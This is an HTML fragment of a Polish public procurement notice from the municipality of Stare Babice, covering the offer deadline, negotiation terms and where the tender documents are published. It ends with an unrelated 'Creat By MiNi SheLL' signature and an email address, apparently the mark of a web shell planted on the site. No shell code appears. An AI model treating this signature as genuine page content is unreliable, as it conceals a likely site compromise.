class="normal">do 2022-06-25</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszystkie informacje dotyczące niniejszego postępowania w szczególności: opis przedmiotu zamówienia i warunki jego wykonania, podstawy wykluczenia i warunki udziału w postępowaniu, rodzaje oświadczeń i dokumentów jakie Wykonawca musi złożyć, kryteria oceny ofert dostępne, informacje dotyczące RODO są w SWZ i ogłoszeniu o zamówieniu dostępnych na stronie internetowej Zamawiającego https://platformazakupowa.pl/pn/stare_babice.

Creat By MiNi SheLL
Email: jattceo@gmail.com